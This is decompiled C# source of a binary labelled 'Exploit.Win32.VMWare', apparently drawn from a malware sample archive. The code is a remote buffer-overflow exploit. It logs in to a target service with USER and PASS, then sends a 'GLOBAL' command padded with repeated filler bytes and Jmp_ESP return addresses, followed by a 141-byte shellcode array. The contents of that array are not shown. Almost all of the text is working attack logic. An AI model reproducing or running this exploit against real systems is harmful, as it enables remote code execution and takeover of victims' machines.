// Decompiled with JetBrains decompiler // Type: // Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe using System; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Security; internal class \u003CModule\u003E { public static \u0024ArrayType\u00240x5efdd7df \u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040; public static \u0024ArrayType\u00240xf1cc4cbd \u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040; public static \u0024ArrayType\u00240x0e6cb2b2 \u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040; public static \u0024ArrayType\u00240x3a9112db \u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040; public static \u0024ArrayType\u00240x5bb2c15a \u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040; public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040; public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040; public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040; public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040; public static \u0024ArrayType\u00240xfec415c1 \u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040; public static \u0024ArrayType\u00240x4b6a6b8c \u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040; public static \u0024ArrayType\u00240x795c090e \u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040; public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP_XP_Eng; public static \u0024ArrayType\u00240x24ec09a1 shellcode; public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP; public static unsafe void usage() { \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ()); \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040, __arglist ()); \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040, __arglist ()); \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040, __arglist ()); \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ()); } public static unsafe int main(int argc, sbyte** argv) { if (argc != 6) { \u003CModule\u003E.usage(); return 0; } WSAData wsaData; \u003CModule\u003E.WSAStartup((ushort) 514, &wsaData); uint num1 = \u003CModule\u003E.socket(2, 1, 6); sockaddr_in sockaddrIn; // ISSUE: cast to a reference type // ISSUE: explicit reference operation ^(short&) ref sockaddrIn = (short) 2; // ISSUE: cast to a reference type // ISSUE: explicit reference operation ^(short&) ((IntPtr) &sockaddrIn + 2) = (short) \u003CModule\u003E.htons((ushort) \u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 8))); // ISSUE: cast to a reference type // ISSUE: explicit reference operation ^(int&) ((IntPtr) &sockaddrIn + 4) = (int) \u003CModule\u003E.inet_addr((sbyte*) *(int*) ((IntPtr) argv + 4)); if (\u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 20)) != 0) { // ISSUE: cast to a reference type // ISSUE: explicit reference operation ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58; // ISSUE: cast to a reference type // ISSUE: explicit reference operation ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124; // ISSUE: cast to a reference type // ISSUE: explicit reference operation ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26; // ISSUE: cast to a reference type // ISSUE: explicit reference operation ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119; } else { // ISSUE: cast to a reference type // ISSUE: explicit reference operation ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58; // ISSUE: cast to a reference type // ISSUE: explicit reference operation ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124; // ISSUE: cast to a reference type // ISSUE: explicit reference operation ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26; // ISSUE: cast to a reference type // ISSUE: explicit reference operation ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119; } if (\u003CModule\u003E.connect(num1, (sockaddr*) &sockaddrIn, 16) == -1) { \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040, __arglist ()); return -1; } \u0024ArrayType\u00240x8011bcc8 arrayType0x8011bcc8; // ISSUE: initblk instruction __memset(ref arrayType0x8011bcc8, 0, 4096); \u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0); \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8)); // ISSUE: initblk instruction __memset(ref arrayType0x8011bcc8, 0, 4096); // ISSUE: cpblk instruction __memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040, 6); \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 12)); \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040); uint num2 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8); \u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num2, 0); // ISSUE: initblk instruction __memset(ref arrayType0x8011bcc8, 0, 4096); \u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0); \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8)); // ISSUE: initblk instruction __memset(ref arrayType0x8011bcc8, 0, 4096); // ISSUE: cpblk instruction __memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040, 6); \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 16)); \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040); uint num3 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8); \u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num3, 0); // ISSUE: initblk instruction __memset(ref arrayType0x8011bcc8, 0, 4096); \u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0); \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8)); // ISSUE: initblk instruction __memset(ref arrayType0x8011bcc8, 0, 4096); // ISSUE: cpblk instruction __memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040, 8); int num4 = (int) ((IntPtr) &arrayType0x8011bcc8 + 11); uint num5 = 36; do { // ISSUE: cpblk instruction __memcpy(num4 - 4, ref \u003CModule\u003E.\u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040, 4); // ISSUE: cpblk instruction __memcpy(num4, ref \u003CModule\u003E.Jmp_ESP, 4); num4 += 8; --num5; } while (num5 > 0U); // ISSUE: cast to a reference type // ISSUE: cpblk instruction __memcpy((\u0024ArrayType\u00240x8011bcc8&) ((IntPtr) &arrayType0x8011bcc8 + 295), ref \u003CModule\u003E.shellcode, 141); \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040); uint num6 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8); \u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num6, 0); \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040, __arglist ()); \u003CModule\u003E.closesocket(num1); \u003CModule\u003E.WSACleanup(); return 1; } [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe int printf([In] sbyte* obj0, __arglist); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern int WSACleanup(); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern int closesocket([In] uint obj0); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe int send([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe uint strlen([In] sbyte* obj0); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe sbyte* strcat([In] sbyte* obj0, [In] sbyte* obj1); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe int recv([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe int connect([In] uint obj0, [In] sockaddr* obj1, [In] int obj2); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe uint inet_addr([In] sbyte* obj0); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe int atoi([In] sbyte* obj0); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern ushort htons([In] ushort obj0); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern uint socket([In] int obj0, [In] int obj1, [In] int obj2); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe int WSAStartup([In] ushort obj0, [In] WSAData* obj1); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern uint _mainCRTStartup(); }